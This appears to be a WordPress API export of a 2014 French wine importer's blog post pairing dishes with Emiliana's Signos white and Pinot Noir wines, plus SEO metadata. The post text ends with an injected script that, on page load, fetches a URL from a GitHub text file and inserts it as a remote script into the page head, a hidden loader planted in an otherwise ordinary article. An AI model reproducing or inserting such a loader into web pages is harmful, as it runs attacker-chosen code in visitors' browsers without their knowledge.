{"id":1251,"date":"2014-11-25T11:31:59","date_gmt":"2014-11-25T10:31:59","guid":{"rendered":"http:\/\/continentduvin.fr\/?p=1251"},"modified":"2024-10-29T15:07:54","modified_gmt":"2024-10-29T14:07:54","slug":"quels-accords-avec-les-mets-pour-les-signos-demiliana","status":"publish","type":"post","link":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/quels-accords-avec-les-mets-pour-les-signos-demiliana\/","title":{"rendered":"Quels Accords avec les mets pour les Signos d&rsquo;Emiliana?"},"content":{"rendered":"<p>On ne pr\u00e9sente plus Emiliana, la r\u00e9f\u00e9rence absolue en terme de Biodynamie au Chili avec \u00e0 sa t\u00eate Alvaro Espinoza, l&rsquo;\u0153nologue star du Chili. Avec ses cuv\u00e9es Signos en Blanc et en Rouge, on retrouve toute la ma\u00eetrise d&rsquo;Emiliana dans l&rsquo;obtention de grands vins. Avoir de grands vins comme ceux l\u00e0 en cave, est une chose mais pouvoir les conseiller avec des accords mets et vins en est une autre. Nous vous proposons ici quelques accords sympathiques:<\/p>\n<p><strong>&#8211; Signos- Chardonnay\/Viognier\/Marsanne\/Roussanne:<\/strong><\/p>\n<p>En Entr\u00e9e, on peut tout a fait imaginer cette cuv\u00e9e sur des fruits de mers travaill\u00e9s avec une belle sauce. On pourra partir par exemple sur un souffl\u00e9 au saumon fum\u00e9 (<a href=\"http:\/\/www.elle.fr\/Elle-a-Table\/Recettes-de-cuisine\/Souffle-au-saumon-2078568\">merveilleuse recette ici<\/a>), des beignets de calamars, des raviolis aux crevettes, une aum\u00f4ni\u00e8re de la mer (<a href=\"http:\/\/chefsimon.lemonde.fr\/aumonieres-fruits-de-mer.html\">belle recette ici<\/a>), et aussi des escargots aux c\u00e8pes, un p\u00e2t\u00e9 de foie de volaille et bien d&rsquo;autres choses.<\/p>\n<p>En plats de r\u00e9sistance, on se lancera sur un saut\u00e9 de porc au cidre, une brandade de Morue, sur une poularde, un risotto aux p\u00e9toncles (<a href=\"http:\/\/lemiammiamblog.canalblog.com\/archives\/2011\/03\/31\/20584942.html\">une bonne recette ici<\/a>)&#8230;<\/p>\n<p>Pour le fromage et le d\u00e9sert, on va pouvoir se faire plaisir sur un Maroille, une Fourme d&rsquo;Ambert, une galette de Pomme au Roquefort.<\/p>\n<p><strong>&#8211; Signos- Pinot Noir:<\/strong><\/p>\n<p>En entr\u00e9e, on va pouvoir s&rsquo;orienter sur un Jambon Pata Negra, une salade de foie de Volaille, une salade de G\u00e9siers, souffl\u00e9 au jambon et au fromage<\/p>\n<p>Pour le plat, pourquoi pas un Ossau Bucco \u00e0 la milanaise, une Jambalaya cr\u00e9ole, un coulis de truffe, un sashimi surimi, une ratatouille \u00e9pic\u00e9e, un poulet au curry.<\/p>\n<p>Et avec le fromage, un ossau iraty, une tome des bauges, un salers<\/p>\n<p>&nbsp;<\/p>\n<p>Ce ne sont que des pistes, vous avez des id\u00e9es, des conseils, venez mettre votre petit grain de sel en commentant cet article&#8230;<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>On ne pr\u00e9sente plus Emiliana, la r\u00e9f\u00e9rence absolue en terme de Biodynamie au Chili avec \u00e0 sa t\u00eate Alvaro Espinoza, l&rsquo;\u0153nologue star du Chili. Avec ses cuv\u00e9es Signos en Blanc et en Rouge, on retrouve toute la ma\u00eetrise d&rsquo;Emiliana dans l&rsquo;obtention de grands vins. Avoir de grands vins comme ceux l\u00e0 en cave, est une [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1254,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_lmt_disableupdate":"no","_lmt_disable":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[13],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v23.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Quels Accords avec les mets pour les Signos d&#039;Emiliana? -<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/quels-accords-avec-les-mets-pour-les-signos-demiliana\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Quels Accords avec les mets pour les Signos d&#039;Emiliana? -\" \/>\n<meta property=\"og:description\" content=\"On ne pr\u00e9sente plus Emiliana, la r\u00e9f\u00e9rence absolue en terme de Biodynamie au Chili avec \u00e0 sa t\u00eate Alvaro Espinoza, l&rsquo;\u0153nologue star du Chili. Avec ses cuv\u00e9es Signos en Blanc et en Rouge, on retrouve toute la ma\u00eetrise d&rsquo;Emiliana dans l&rsquo;obtention de grands vins. Avoir de grands vins comme ceux l\u00e0 en cave, est une [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/quels-accords-avec-les-mets-pour-les-signos-demiliana\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/ContinentDuVin\/\" \/>\n<meta property=\"article:published_time\" content=\"2014-11-25T10:31:59+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-10-29T14:07:54+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/continentduvin.fr\/wp-content\/uploads\/2014\/11\/Frise_article_accord-mets-et-vins.jpeg\" \/>\n\t<meta property=\"og:image:width\" content=\"900\" \/>\n\t<meta property=\"og:image:height\" content=\"250\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Continent du Vin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Continent du Vin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/quels-accords-avec-les-mets-pour-les-signos-demiliana\/\",\"url\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/quels-accords-avec-les-mets-pour-les-signos-demiliana\/\",\"name\":\"Quels Accords avec les mets pour les Signos d'Emiliana? -\",\"isPartOf\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/quels-accords-avec-les-mets-pour-les-signos-demiliana\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/quels-accords-avec-les-mets-pour-les-signos-demiliana\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/continentduvin.fr\/wp-content\/uploads\/2014\/11\/Frise_article_accord-mets-et-vins.jpeg\",\"datePublished\":\"2014-11-25T10:31:59+00:00\",\"dateModified\":\"2024-10-29T14:07:54+00:00\",\"author\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#\/schema\/person\/89ec7a9b781c7b216196c9436b7aaafc\"},\"breadcrumb\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/quels-accords-avec-les-mets-pour-les-signos-demiliana\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/quels-accords-avec-les-mets-pour-les-signos-demiliana\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/quels-accords-avec-les-mets-pour-les-signos-demiliana\/#primaryimage\",\"url\":\"https:\/\/continentduvin.fr\/wp-content\/uploads\/2014\/11\/Frise_article_accord-mets-et-vins.jpeg\",\"contentUrl\":\"https:\/\/continentduvin.fr\/wp-content\/uploads\/2014\/11\/Frise_article_accord-mets-et-vins.jpeg\",\"width\":900,\"height\":250},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/quels-accords-avec-les-mets-pour-les-signos-demiliana\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Quels Accords avec les mets pour les Signos d&rsquo;Emiliana?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#website\",\"url\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/\",\"name\":\"\",\"description\":\"Importateur de Vins du Monde depuis 2004\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#\/schema\/person\/89ec7a9b781c7b216196c9436b7aaafc\",\"name\":\"Continent du Vin\",\"description\":\"Continent du Vin est importateur de vins d'Afrique du Sud, du Chili, d'Argentine, d'Oc\u00e9anie, d'Italie et d'Espagne depuis 2004. Au fil du temps, nous essayons de vous faire d\u00e9couvrir de nouveaux domaines et de nouvelles cuv\u00e9es pour vous faire voyager ! Rejoignez-nous sur notre profil Google+\",\"sameAs\":[\"http:\/\/www.continentduvin.fr\",\"https:\/\/www.facebook.com\/ContinentDuVin\/\"],\"url\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Quels Accords avec les mets pour les Signos d'Emiliana? -","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/quels-accords-avec-les-mets-pour-les-signos-demiliana\/","og_locale":"fr_FR","og_type":"article","og_title":"Quels Accords avec les mets pour les Signos d'Emiliana? -","og_description":"On ne pr\u00e9sente plus Emiliana, la r\u00e9f\u00e9rence absolue en terme de Biodynamie au Chili avec \u00e0 sa t\u00eate Alvaro Espinoza, l&rsquo;\u0153nologue star du Chili. Avec ses cuv\u00e9es Signos en Blanc et en Rouge, on retrouve toute la ma\u00eetrise d&rsquo;Emiliana dans l&rsquo;obtention de grands vins. Avoir de grands vins comme ceux l\u00e0 en cave, est une [&hellip;]","og_url":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/quels-accords-avec-les-mets-pour-les-signos-demiliana\/","article_author":"https:\/\/www.facebook.com\/ContinentDuVin\/","article_published_time":"2014-11-25T10:31:59+00:00","article_modified_time":"2024-10-29T14:07:54+00:00","og_image":[{"width":900,"height":250,"url":"https:\/\/continentduvin.fr\/wp-content\/uploads\/2014\/11\/Frise_article_accord-mets-et-vins.jpeg","type":"image\/jpeg"}],"author":"Continent du Vin","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Continent du Vin","Dur\u00e9e de lecture estim\u00e9e":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/quels-accords-avec-les-mets-pour-les-signos-demiliana\/","url":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/quels-accords-avec-les-mets-pour-les-signos-demiliana\/","name":"Quels Accords avec les mets pour les Signos d'Emiliana? -","isPartOf":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#website"},"primaryImageOfPage":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/quels-accords-avec-les-mets-pour-les-signos-demiliana\/#primaryimage"},"image":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/quels-accords-avec-les-mets-pour-les-signos-demiliana\/#primaryimage"},"thumbnailUrl":"https:\/\/continentduvin.fr\/wp-content\/uploads\/2014\/11\/Frise_article_accord-mets-et-vins.jpeg","datePublished":"2014-11-25T10:31:59+00:00","dateModified":"2024-10-29T14:07:54+00:00","author":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#\/schema\/person\/89ec7a9b781c7b216196c9436b7aaafc"},"breadcrumb":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/quels-accords-avec-les-mets-pour-les-signos-demiliana\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/quels-accords-avec-les-mets-pour-les-signos-demiliana\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/quels-accords-avec-les-mets-pour-les-signos-demiliana\/#primaryimage","url":"https:\/\/continentduvin.fr\/wp-content\/uploads\/2014\/11\/Frise_article_accord-mets-et-vins.jpeg","contentUrl":"https:\/\/continentduvin.fr\/wp-content\/uploads\/2014\/11\/Frise_article_accord-mets-et-vins.jpeg","width":900,"height":250},{"@type":"BreadcrumbList","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/quels-accords-avec-les-mets-pour-les-signos-demiliana\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/"},{"@type":"ListItem","position":2,"name":"Quels Accords avec les mets pour les Signos d&rsquo;Emiliana?"}]},{"@type":"WebSite","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#website","url":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/","name":"","description":"Importateur de Vins du Monde depuis 2004","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Person","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#\/schema\/person\/89ec7a9b781c7b216196c9436b7aaafc","name":"Continent du Vin","description":"Continent du Vin est importateur de vins d'Afrique du Sud, du Chili, d'Argentine, d'Oc\u00e9anie, d'Italie et d'Espagne depuis 2004. Au fil du temps, nous essayons de vous faire d\u00e9couvrir de nouveaux domaines et de nouvelles cuv\u00e9es pour vous faire voyager ! Rejoignez-nous sur notre profil Google+","sameAs":["http:\/\/www.continentduvin.fr","https:\/\/www.facebook.com\/ContinentDuVin\/"],"url":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/author\/admin\/"}]}},"modified_by":"Continent du Vin","_links":{"self":[{"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/posts\/1251"}],"collection":[{"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/comments?post=1251"}],"version-history":[{"count":1,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/posts\/1251\/revisions"}],"predecessor-version":[{"id":15012,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/posts\/1251\/revisions\/15012"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/media\/1254"}],"wp:attachment":[{"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/media?parent=1251"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/categories?post=1251"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/tags?post=1251"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}